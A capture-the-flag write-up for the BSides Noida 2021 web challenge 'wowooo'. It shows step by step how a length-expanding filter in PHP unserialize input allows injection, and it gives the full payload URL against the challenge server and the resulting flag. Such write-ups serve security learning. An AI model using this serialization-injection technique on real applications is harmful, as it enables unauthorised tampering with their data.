CTFtime.org / BSides Noida CTF / wowooo / Writeup

# Solution

There are no interesting things on the web page so I look at the source code

```html
PLSSS DONT HACK ME!!!!!!

```

There is a comment "**debug**"

So we have to set "**debug**" http parameter

`34.88.85.200:4001/?debug`

We can see the source code
```php

```
Let's understand the code
```php

```
The rest is checking `debug` http parameter and if it is seted show the source *code*

So far we understand the code

To get the **flag** the second index of the result from `unserialize` must be "V13tN4m_number_one " instead of "Fl4g_in_V13tN4m"

Our *input* which is combined with *serialization format* in `$ser` variable is unfiltered and we can do **injection** attack!

But we can't send `";i:1;s:19:"V13tN4m_number_one ";}` straight because `strlen($username)` return the length of our whole payload
```
a:2:{i:0;s:strlen($username):"$username;...

becomes

a:2:{i:0;s:34:"";i:1;s:19:"V13tN4m_number_one ";}...
```
The integer after **first** `s` must be the length of the **first** string.In our case it is `34` and the string is empty ""

So it doesn't work

Luckily there is `filter` function which replaces "flag" with "flagcc" and extending the length of the **first** string by 2.The function is called after `strlen($username)` so we can make our *length* of **first string** equals to the result of `strlen`

After trying for the length to be matched, the final *payload* looks like this

`flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}`

When we pass that *payload*
```
before passing to filter function
a:2:{i:0;s:102:"flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}...

after passing to filter function
a:2:{i:0;s:102:"flagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagcc";i:1;s:19:"V13tN4m_number_one ";}..
```
The length of **first** string `flagccflagcc...` is now 102 and it equals to the integer after **first** `s`

Send that **payload**!!!

`http://34.88.85.200:4001/?name=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag%22;i:1;s:19:%22V13tN4m_number_one%20%22;}`

And there is the flag

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo/info.png)

*flag*: `BSNoida{3z_ch4all_46481684185_!!!!!!@!}`

Original writeup (https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo).

wowooo

Comments

Sign in with